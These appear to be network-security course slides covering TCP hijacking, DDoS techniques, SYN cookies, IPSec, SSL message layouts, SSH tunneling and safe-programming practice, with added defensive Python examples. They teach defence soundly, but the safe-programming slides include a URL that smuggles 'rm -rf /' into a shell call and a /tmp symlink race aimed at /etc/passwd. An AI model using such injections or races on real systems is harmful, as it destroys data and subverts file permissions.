E sends SYN to A with source B. A responds with SYN+ACK to B. If E can guess the ISN in 2, it can respond with ACK+DATA before B can send RST. E might use a disconnected B, prevent it from sending the RST, or prevent 2 from reaching B.
A can't tell the difference between B → A and E → A.
Network Security p.260

TCP hijacking: one way desynchronization
(Figure: client and server sliding windows; the server's window starts at sequence number a.)
The server's window should intersect with the client's, with its left edge to the right of the client's left edge.

Network Security p.261

TCP hijacking one way desynchronization. . .

Consider sliding window protocols such as TCP. Data flow direction: C → S. Client proposes ISN. Server proposes window size for flow control. Server discards any data outside the window, i.e., < a or > b, and sends an ACK for a. Server cannot advance the window without receiving data at seq num a. In a desynchronized state, it never will. Attacker can feed data starting at a to S. When S responds with an ACK, it falls outside C's window.

Network Security p.262

TCP hijacking: early attack
Break a legit connection between C and S.
C → S: SYN(ISN = x)
S → C: ACK_{x+1}, SYN(ISN = s)
X → S: ACK_{s+1}, RST. S now thinks that C has broken the connection. But C has established its sending window to be [x, x + w].
Establish another connection between C and S.
X → S: SYN(ISN = a)
S → C: ACK_{a+1}, SYN(ISN = s'). Ignored by C because an ACK of a + 1 is outside its window of [x, x + w] and a SYN of s' is probably outside of [s, s + w].

Network Security p.263

DNS based attacks


See Christoph Schubas MS thesis defense slides.

Network Security p.264

(Distributed) Denial of Service
Relatively new development. Feb 2000 saw attacks on Yahoo, buy.com, ebay, Amazon, CNN.
One form of DDoS attack simply saturates the network. Prevents legitimate use of resources such as Web services.
Another form exploits vulnerabilities to crash machines. Results in degradation of services on the network. Locked up accounts.

Network Security p.265

A Simple DOS Attack
Attacker → Zombie → Victim
Attacker uses indirection to attack a victim.

Network Security p.266

A DDOS Attack
(Figure: a tree of attacker, intermediate hosts and zombies Z, all directing traffic at the victim.)

Network Security p.267

Distributed Denial of Service


Many more pathways utilized to attack the victim. Can involve hundreds or thousands of machines all over the Internet. Break into weakly-secured computers using well known bugs. Conceal the break-in and hide traces of subsequent activity. Install software to remote control the machine. Launch a coordinated attack on the victim.

Network Security p.268

Flooding Attacks
Smurf attack: send ICMP ECHO to a broadcast address with the source address of the victim. TCP SYN attack: send SYN datagrams to the victim with forged, non-existent source addresses. UDP flooding: send UDP datagrams at high volume to ports on the victim machine.

Network Security p.269

Logic Attacks
Ping of Death. Construct an ICMP ECHO datagram as fragments such that the assembled datagram exceeds the 64K limit for IP datagrams. An IP datagram has a 13-bit frag offset specified in 8-byte units. Highest offset = 2^16 − 8! The problem is with IP reassembly.
Land. Send a datagram with the same source and destination address.

Network Security p.270

Defeating DDOS
Egress ltering. Stop spoofed packets from leaving your network. Stop your network from being used as an amplication site.
Disable IP directed broadcast on all systems.

Network Security p.271

Countering DOS
Simple cookies. Would need to remember them.
A → B: start protocol
B → A: challenge
A → B: challenge, really start protocol
TCP SYN cookies. Particular choices of ISN. Self verifying, e.g.:
ISN = MD5(secret, time, src_ip, src_pt, dest_ip, dest_pt)
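A SYN cookie in the shape the slide gives, with the server-side check of the returning ACK against the current and previous time slot, so no state is held per half-open connection. Added example, not the course's or Linux's implementation (which also packs the MSS into the cookie); the 64-second slots, the secret and the addresses are constructed.

```python
"""Self-verifying ISNs (SYN cookies): MD5(secret, time, src_ip, src_pt,
dest_ip, dest_pt) truncated to 32 bits, verified again on the final ACK."""
import hashlib
import hmac
import socket
import struct

SLOT_SECONDS = 64          # coarse time slot so a cookie stays valid briefly
MAX_SLOT_AGE = 1           # accept the current and the previous slot


def time_slot(now: float) -> int:
    return int(now) // SLOT_SECONDS


def syn_cookie(secret: bytes, src_ip: str, src_pt: int,
               dst_ip: str, dst_pt: int, slot: int) -> int:
    """32-bit ISN = first 4 bytes of MD5 over the slide's tuple."""
    material = secret + struct.pack(
        "!I4sH4sH", slot, socket.inet_aton(src_ip), src_pt,
        socket.inet_aton(dst_ip), dst_pt)
    return struct.unpack("!I", hashlib.md5(material).digest()[:4])[0]


def choose_isn(secret, src_ip, src_pt, dst_ip, dst_pt, now: float) -> int:
    """Server side of the SYN: pick the ISN and keep no per-connection state."""
    return syn_cookie(secret, src_ip, src_pt, dst_ip, dst_pt, time_slot(now))


def ack_is_valid(secret, src_ip, src_pt, dst_ip, dst_pt,
                 ack: int, now: float) -> bool:
    """Server side of the final ACK: recompute the cookie for the recent
    slots and compare with ack - 1 (the client acknowledges ISN + 1)."""
    isn = struct.pack("!I", (ack - 1) & 0xFFFFFFFF)
    slot = time_slot(now)
    ok = False
    for age in range(MAX_SLOT_AGE + 1):
        expected = syn_cookie(secret, src_ip, src_pt, dst_ip, dst_pt, slot - age)
        ok |= hmac.compare_digest(struct.pack("!I", expected), isn)
    return ok


if __name__ == "__main__":
    secret = b"constructed-server-secret"
    isn = choose_isn(secret, "10.0.0.5", 40001, "10.0.0.1", 80, now=1000.0)
    print(isn, ack_is_valid(secret, "10.0.0.5", 40001, "10.0.0.1", 80,
                            isn + 1, now=1000.0))
```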

Network Security p.272

Countering DOS
Require clients to do work in order to connect [Juel99].
E.g., what 27-bit number has a SHA checksum of x?

Network Security p.273

Linux Netfilter

Network Security p.274

IPSec [Sta03, Chapter 16]
IPSec is communication security provided at the network layer. Communication protected with a session key is called a security association, a triple <SPI, dest address, AH | ESP>.
Provides security for security-ignorant network applications. Somewhat transparent to the application. Can be implemented as bump-in-the-wire.
Flexible enough to allow secure branch office connectivity over the Internet and secure remote access over the Internet.
Network Security p.275

IPSec. . .
We will restrict ourselves to IPv4 with IPSec in tunnel mode. Transport the original datagram in its entirety inside another one.

Network Security p.276

A Simple IPSec scenario

Network Security p.277

Some IPSec Terminology. . .SA


Security Association
One-way relationship between sender and receiver. An SA can be used with AH or ESP, but not both. It is identified at a host h by the triple: SPI (32 bits, local significance at h), IP destination address (unicast or multicast), security protocol identifier. SA related data includes seq#, anti-replay window, AH/ESP params, SA lifetime, . . .

Network Security p.278

Some IPSec Terminology. . .
Security Policy Database (SPD)
Contains entries, each of which defines a subset of IP traffic and points to an SA for that traffic. Each entry is defined by a set of IP and upper-layer protocol field values, called selectors. A selector can specify a match against src/dest addr/port, transport-layer protocol.
(Figure: outbound IP packet → SPD selector <dst=137.132.0.0/16> → SAD entry <AES key=0x...., MAC=HMAC-MD5, ....> → encrypted packet.)

Network Security p.279

Authentication Header
Provides support for data integrity and authentication. Prevents address spoofing attacks. Guards against replay attacks. The communicating parties must share a key.
AH format: Next hdr | Header len | Reserved; SPI; Sequence #; Authentication data/ICV (variable).

Network Security p.280

Authentication Header. . .
Authenticates its payload + immutable parts of the outer IP header.
Must support HMAC-MD5-96 & HMAC-SHA-1-96. Mutable fields are set to 0 when computing the ICV. The Authentication Data field is set to 0 when calculating the ICV. Problem for NAT.
Header len = header size in 32-bit words − 2. The sequence number is used to recognize replayed packets. A new SA initializes it to 0. Anti-replay does not permit recycling past 2^32 − 1. The receiver should implement a window to check for replay.

Network Security p.281

Encapsulating Security Payload
Provides confidentiality of message contents and limited traffic flow confidentiality. Can provide the same authentication services as AH.
ESP format: SPI; Sequence #; IV (if the SA requires it); Payload data (variable); Padding (0–255 bytes) | Pad length | Next header; Authentication data (variable/optional).
Network Security p.282

Encapsulating Security Payload. . .


Next header identifies the payload type. The encryption IV is the first part of the payload (unencrypted, of course). Variable padding hides the real payload length. Tunnel mode hides inner packet addresses. For encryption + authentication, authentication applies to the encrypted data; the IP header is not protected.

Network Security p.283

Some thoughts on IPSec


The ESP authenticates encrypted payload. Is there need for separate AH when ESP can provide the same functionality? Should AH authenticate IP header elds?

Network Security p.284

VPNs one way to do it


Home machine needs an address on the inside virtual interface with an inside address. Destinations on the inside routed via this interface. One tunneled ESP SA from home GW. Datagrams for inside tunneled to GW. GW de-tunnels and forwards it on the inside.

Network Security p.285

VPNs: one way to do it. . .


GW address = 137.132.1.1. Home m/c public address = 218.186.1.1. Home m/c inside address = 137.132.2.1. Home m/c trying to reach 137.132.3.1.

[Figure: VPN tunnel from the home network (218.186.0.0/16, home m/c at 218.186.1.1) to the NUS network (137.132.0.0/16, GW at 137.132.1.1); the home m/c appears inside as 137.132.2.1 and reaches 137.132.3.1.]

Network Security p.286

Simplified SSL protocol


Consider a simplified SSL protocol exchange.
  1. C → S: Supported cipher suites, 28B randomness r1
  2. S → C: Chosen cipher suite, 28B randomness r2
  3. S → C: Server cert
  4. C → S: E_servPubKey(Client-selected 48B PMS)
Both parties compute MS = h(pms || r1 || r2). Encryption & MAC keys are derived from MS.

Network Security p.287

Subset of SSL Messages


Record layer header: [Protocol, Version, Length]. Record protocol types:
  ChangeCipherSpec (20)
  Alert (21)
  Handshake (22)
  Application (23)

Handshake message types:
  HelloRequest (0)
  ClientHello (1)
  ServerHello (2)
  Certificate (11)
  ServerKeyExchange (12)
  CertificateRequest (13)
  ServerHelloDone (14)
  CertificateVerify (15)
  ClientKeyExchange (16)
  Finished (20)

Network Security p.288

A basic but complete SSL protocol interaction

  1. C → S: ClientHello
  2. S → C: ServerHello
  3. S → C: Certificate
  4. S → C: ServerHelloDone
  5. C → S: ClientKeyExchange
  6. C → S: ChangeCipherSpec
  7. C → S: Finished
  8. S → C: ChangeCipherSpec
  9. S → C: Finished

Network Security p.289

Client Hello
From an Ethereal trace (SSLv2).
  Length (2 bytes).
  Client Hello (1 byte) = 0x01.
  Version (2 bytes) = 0x0301, i.e. SSL 3.1.
  Cipher Spec Length (2 bytes), say = .
  Session ID Length (2 bytes), probably = 0 for a new connection.
  Challenge Length (2 bytes), say = x.
  Cipher specs of 3 bytes each, = /3.
  Challenge, x bytes.

Network Security p.290

Server Hello
Response is SSLv3. From server → client. SSLv3 record layer: Handshake.
  Type (1 byte) = Handshake (22). Version (2 bytes) = 0x0301. Length (2 bytes).

Payload can carry multiple messages.
  Handshake Type (1 byte) = Server Hello (2). Length (3 bytes). Why 3? Can it be split across a record? Version (2 bytes) = 0x0301. Random time (4 bytes). Random bytes (28 bytes). Session Id Length (1 byte). Session Id (32 bytes).

Network Security p.291

Certificate (S → C)

Response is SSLv3.1. From server → client. SSLv3 record layer: Handshake.

  Type (1 byte) = Handshake (22). Version (2 bytes) = 0x0301. Length (2 bytes). Payload:
  Handshake Type (1 byte) = Certificate (11). Length (3 bytes). Why 3? Can it be split across a record? No Version field. Certificates: length of the whole blob (3 bytes). Certificate chain.

Network Security p.292

Server Hello Done


Response is SSLv3.1. From server → client. SSLv3 record layer: Server Hello.
  Type (1 byte) = Handshake (22). Version (2 bytes) = 0x0301. Length (2 bytes). Payload:
  Handshake Type (1 byte) = Server Hello Done (14). Length (3 bytes), value = 0.

Network Security p.293

Client Key Exchange


From client → server. SSLv3.1 record layer type: Handshake.
  Type (1 byte) = Handshake (22). Version (2 bytes) = 0x0301. Length (2 bytes), say = x. Payload is the Client Key Exchange message:
  Type (1 byte) = Client Key Exchange (16). No Version field. Length (3 bytes), say = y. y bytes of data blob, so x = y + 4.

Network Security p.294

Change Cipher Spec (C → S)


From client → server. SSLv3.1 record layer type: Change Cipher Spec.
  Type (1 byte) = Change Cipher Spec (20). Version (2 bytes) = 0x0301. Length (2 bytes), value = 1. Payload is 1 byte of value 1.

Network Security p.295

Client Encrypted Handshake Finished

From client → server. SSLv3.1 record layer type: Handshake.

  Type (1 byte) = Handshake (22). Version (2 bytes) = 0x0301. Length (2 bytes), say = x. x bytes of encrypted data blob.

Network Security p.296

Change Cipher Spec (S → C)


From server → client. SSLv3.1 record layer type: Change Cipher Spec.
  Type (1 byte) = Change Cipher Spec (20). Version (2 bytes) = 0x0301. Length (2 bytes), value = 1. Payload is 1 byte of value 1.

Network Security p.297

Server Encrypted Handshake Finished

From server → client. SSLv3.1 record layer type: Handshake.

  Type (1 byte) = Handshake (22). Version (2 bytes) = 0x0301. Length (2 bytes), say = x. x bytes of encrypted data blob.

Network Security p.298

Application data
SSLv3.1 record layer: Application data.
  Type (1 byte) = Application data (23). Version (2 bytes) = 0x0301. Length (2 bytes), say = x. Payload is encrypted data of x bytes.

Network Security p.299
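The record-layer and handshake layouts walked through on the preceding slides, turned into a small parser as an added example (not code from the lecture). It checks every length before slicing, handles a record carrying more than one handshake message, and decodes the ServerHello body; the sample record it parses is constructed here, not captured traffic.

```python
"""Parse one SSLv3.1 record and the handshake messages it carries.
Added example, not from the lecture slides; the sample record below is
constructed to match the layouts the slides describe, not captured traffic."""
import struct

HANDSHAKE_NAMES = {1: "ClientHello", 2: "ServerHello", 11: "Certificate",
                   12: "ServerKeyExchange", 13: "CertificateRequest", 14: "ServerHelloDone",
                   15: "CertificateVerify", 16: "ClientKeyExchange", 20: "Finished"}

def parse_record(buf):
    """Record header: Type (1 byte), Version (2 bytes), Length (2 bytes). Returns
    (type, version, payload, rest); every length is checked before slicing."""
    if len(buf) < 5:
        raise ValueError("truncated record header")
    rtype, version, length = struct.unpack("!BHH", buf[:5])
    if len(buf) < 5 + length:
        raise ValueError("record length exceeds buffer")
    return rtype, version, buf[5:5 + length], buf[5 + length:]

def parse_handshake_messages(payload):
    """A Handshake record may carry several messages, each Type (1 byte) +
    Length (3 bytes) + body, so a record holding one message has x = y + 4."""
    msgs = []
    while payload:
        if len(payload) < 4:
            raise ValueError("truncated handshake header")
        hlen = int.from_bytes(payload[1:4], "big")
        if len(payload) < 4 + hlen:
            raise ValueError("handshake message runs past the record")
        msgs.append((HANDSHAKE_NAMES.get(payload[0], payload[0]), payload[4:4 + hlen]))
        payload = payload[4 + hlen:]
    return msgs

def parse_server_hello(body):
    """ServerHello body: Version (2), Random time (4) + Random bytes (28),
    Session Id Length (1), Session Id (0..32 bytes)."""
    if len(body) < 35:
        raise ValueError("truncated ServerHello")
    version, gmt_time, rnd, sid_len = struct.unpack("!HI28sB", body[:35])
    if sid_len > 32 or len(body) < 35 + sid_len:
        raise ValueError("bad session id length")
    return {"version": version, "random": struct.pack("!I", gmt_time) + rnd,
            "session_id": body[35:35 + sid_len]}

def build_sample_record():
    """Constructed record: ServerHello (empty session id) + ServerHelloDone."""
    hello = struct.pack("!HI28sB", 0x0301, 0x5EED0001, b"\x11" * 28, 0)
    hello_msg = bytes([2]) + len(hello).to_bytes(3, "big") + hello
    done_msg = bytes([14]) + (0).to_bytes(3, "big")    # Length = 0
    payload = hello_msg + done_msg
    return struct.pack("!BHH", 22, 0x0301, len(payload)) + payload   # Handshake (22)
```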

Certificates
A certificate binds a name to a key. Fields, from [Tho00, Appendix A.1]:
  Version
  Serial Number
  Algorithm Id
  Issuer
  Validity
  Subject
  Subject's Public Key
  Issuer Unique Id (optional)
  Subject Unique Id (optional)
  Extensions (optional)
  Signature

Network Security p.300

Certificate Authority

[Figure: Root CA at the top, with subordinate CAs CA1, CA2 and CA3 beneath it.]

Everyone has the root's certificate and trusts it. Trust flows from root → leaf. Is trust transitive?

Getting a person's public key in order to communicate with them, say scott.mcnealy@sun.com? Use IBE.

Network Security p.301

JSSE SSLContext

[Figure: SSLContext initialized from KeyManager[..] and TrustManager[..].]

javax.net.ssl.SSLContext. Used to create both client and server SSL sockets.
  SSLContext.getSocketFactory().createSocket(url, 443);
  SSLContext.getServerSocketFactory();

Network Security p.302

JSSE SSLContext. . .
  SSLContext sc = SSLContext.getInstance("TLS");
  sc.init(KeyManager[], TrustManager[], SecureRandom);
KeyManagers are responsible for managing key material, e.g., SunX509. TrustManagers manage the trust material that is used when making trust decisions, e.g., SunX509.

Network Security p.303

JSSE Keystore
Represents a storage facility for cryptographic keys and certificates. Can be thought of as a hash table indexed by alias (a String), with the value being one of:
  A [private_key, certificate_chain] tuple of type KeyStore.PrivateKeyEntry.
  A trusted certificate of type KeyStore.TrustedCertificateEntry.
  Others. . .

Network Security p.304

Secure Shell Tunneling (Reverse)


How to forward remote X-clients (on host R) to the local X-server (L) over a protected SSH tunnel? Why? The firewall protecting L may only permit outbound connections to remote hosts at port 22. Have remote X-clients believe the X server is running at port 6001 [DISPLAY=localhost:1.0]. Tunnel TCP connections made to R:6001 → L:6000. In ~/.ssh/config:

Or, use ssh -R 6001:localhost:6000 <R>. The tunnel is set up when you ssh from L → R.



Network Security p.305

Secure Shell Tunneling (Forward)


How to forward local clients (on host L) to services running on hosts reachable from R, say to R. Say the remote service runs at port p. Tunnel TCP connections made to L:p → R:p. In ~/.ssh/config:



The tunnel is set up when you ssh from L → R.

Network Security p.306

Tunnels in Tandem
Tunnel X clients running on C to display on A.
  1. RemoteForward 17439 localhost:6000.
  2. RemoteForward 6001 localhost:17439.
On C: typeset -x DISPLAY=localhost:1.0.

Network Security p.307

Vtun virtual tunnels


For more information, see here. Uses the tun driver. Opening /dev/net/tun creates a new virtual networking interface. Raw IP datagrams written to the FD are sent up the IP stack on localhost. Reading from the FD retrieves every datagram exiting the virtual networking interface.

Network Security p.308

Vtun virtual tunnels

[Figure: vtun between two hosts: virtual interfaces 10.0.0.1 and 10.0.0.2 on top of real interfaces, one on 137.132/16 and one with default route 0.0.0.0/0, with NAT between them.]

Network Security p.309

Netfilter (hooks)
See the Netfilter howto. The five hooks:
  NF_IP_PRE_ROUTING [ip_input.c:ip_rcv()]
  NF_IP_LOCAL_IN [ip_input.c:ip_local_deliver]
  NF_IP_FORWARD [ip_forward.c:ip_forward()]
  NF_IP_LOCAL_OUT [ip_output.c:(various functions)]
  NF_IP_POST_ROUTING [ip_output.c:(various functions)]
Attach packet filtering rules at NF_IP_LOCAL_IN (for input) & NF_IP_LOCAL_OUT (for output).

Network Security p.310

Netfilter callbacks

[Figure: packet path through the hooks. Arriving from outside: PRE_ROUTING → routing lookup → either FORWARD → POST_ROUTING (back out) or LOCAL_IN (into the box). Locally generated: from the box → LOCAL_OUT → routing lookup → POST_ROUTING.]

Network Security p.311

Safe Programming
Borrowed heavily from a talk by Alec Muffett and Casper Dik in 1998

Network Security p.312

General Remarks
  Security is not an add-on. Adding cryptography to a house of cards doesn't make it a castle.
  Security is orthogonal to functionality. Functional testing will not usually reveal security problems.
  Better coding is essential. Secure programming is a mindset.
  Detect the unexpected. Abort sensibly if surprised. Test all return codes.
  Never trust your input.
  Random numbers: how random are they?

Safe Programming p.313

On Commenting Code
Comment complicated blocks with non obvious side effects. Document why certain privileges and permissions are needed. Why setuid root, why setgid sys? Why owned by bin, writable by group mail?

Safe Programming p.314

On Trusting Input
Command line arguments? Environment variables? File descriptor table? Umask? Resource limits? Signal state (mask, pending)? CWD? Use Perl's taint mode.

Safe Programming p.315

Bounds Checking
Never use gets, strcat, strcpy, sprintf etc. Be aware of how these functions treat NUL.

Safe Programming p.316

Using Randomness
Be careful when generating session keys, nonces, etc. whose impact on security is substantial.

Safe Programming p.317

Avoiding Race Conditions


TOCTOU: Time-Of-Check-to-Time-Of-Use.

See man 2 access. Check and use are not atomic. Any consecutive references to a file by name are at risk. Example: find /tmp -mtime +7 -print | xargs rm -f. The attacker
creates /tmp/x/etc/passwd and quickly renames /tmp/x to /tmp/x2 and symlinks /tmp/x → /.

Safe Programming p.318
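The defensive counterpart to the access()-then-open() pattern the slide warns about, as an added example (not code from the lecture): open first, then check the descriptor with fstat(), so the check and the use refer to the same object. The function name and the temporary directory, file and symlink in demo() are constructed here.

```python
"""Open a file without a check-then-use (TOCTOU) race.
Added example, not from the lecture slides. Instead of access()/stat() on a
path and then open() (two references to the file by name, which can change
in between), open first and inspect the descriptor you actually obtained.
The directory, file and symlink used by demo() are constructed here."""
import os
import stat
import tempfile

O_NOFOLLOW = getattr(os, "O_NOFOLLOW", 0)   # do not follow a symlink at the final component

def open_private_regular(path):
    """Open path read-only, then check on the fd (not the name) that it is a
    regular file owned by the calling user. Returns the fd, or raises OSError."""
    fd = os.open(path, os.O_RDONLY | os.O_NOCTTY | O_NOFOLLOW)
    try:
        st = os.fstat(fd)               # describes exactly the object we hold open
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("not a regular file")
        if st.st_uid != os.getuid():
            raise PermissionError("not owned by us")
        return fd
    except Exception:
        os.close(fd)                    # never leak the descriptor on rejection
        raise

def _rejects(path):
    """True if open_private_regular refuses path (ELOOP on a symlink, or our checks)."""
    try:
        os.close(open_private_regular(path))
    except OSError:
        return True
    return False

def demo():
    """Constructed scenario: a plain file we own is accepted; a symlink to it
    (the /tmp trick from the slide) and a directory are rejected.
    Returns (file_ok, symlink_rejected, dir_rejected)."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "data.txt")
        with open(target, "w") as f:
            f.write("constructed sample data\n")
        link = os.path.join(d, "link")
        os.symlink(target, link)
        file_ok = not _rejects(target)
        return file_ok, _rejects(link), _rejects(d)
```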

Using powerful interpreters


Don't invoke the shell. No popen, system, exec*p.

What if the url was something like http://www./bin/rm -rf / 2> /dev/nullcomp...?



Safe Programming p.319

Tamper Resistance: A Cautionary Note

Tamper resistance the old-fashioned way: make code books heavy. Print sensitive information in water-soluble ink, on cellulose nitrate for rapid destruction. Susceptible to surprise and sudden capture.

Safe Programming p.320

Levels of Tamper Resistance


Against Clever Outsiders: intelligent but with insufficient system knowledge; take advantage of existing weaknesses.
Against Knowledgeable Insiders: have specialized knowledge and experience; highly sophisticated tools and instruments.
Against Funded Organizations: can assemble a team of experts; sophisticated attacks using the most advanced analysis tools.

Safe Programming p.321

Smartcards and Microcontrollers


Assume that attackers can obtain several examples of the target equipment. Prevent programming by covering the programming voltage contact on the card with tape. Unusual voltages and temperatures can affect EEPROM write operations. Internal memory may be read out when voltage is low. On-board random # generators may generate low-entropy sequences when the voltage is lowered slightly. Circuitry to prevent single-stepping attacks may cause lots of false positives.

Power and clock transients can be used to affect decoding and execution of instructions. E.g., reveal extra bytes (perhaps keys).

Safe Programming p.322

Smartcards and Microcontrollers

Answer-transmit loop from the previous slide's point: if a transient corrupts the test at line 3, the card keeps transmitting bytes past answer_length.
  1  b = answer_address
  2  a = answer_length
  3  if (a == 0) goto 8
  4  transmit(*b)
  5  b = b + 1
  6  a = a - 1
  7  goto 3
  8  ...

Safe Programming p.323

Administrivia

Safe Programming p.324

April 1, 2005
April 16th will be considered as an extra class period.
Security problems with DNS. Rats and writing safer code. SSH tunneling. Vtuns. IPtables. Primes is in P. Steganography (Nasir's slides). Tamper resistance of Smart Cards. Pushback (for Congestion Control).

Administrivia p.325

References
A complete list of references can be found here.

References
[Bar02] Thomas H. Barr. Invitation to Cryptology. Prentice Hall, 2002.
[BCK96a] Mihir Bellare, Ran Canetti, and Hugo Krawczyk. Keying hash functions for message authentication. Proceedings of Crypto, 1996. An expanded version is available at http://www-cse.ucsd.edu/users/mihir.
[BCK96b] Mihir Bellare, Ran Canetti, and Hugo Krawczyk. Message authentication using hash functions: the HMAC construction. Technical report, RSA Laboratories, 1996.
[Bla94] Matt Blaze. Protocol failure in the escrowed encryption standard. Proceedings of Second ACM Conference on Computer and Communications Security, November 1994.
[BM92] Steven M. Bellovin and Michael Merritt. Encrypted Key Exchange: Password-Based Protocols Secure Against Dictionary Attacks. In Proceedings of the Symposium on Research in Security and Privacy, Oakland, CA, May

Administrivia p.326
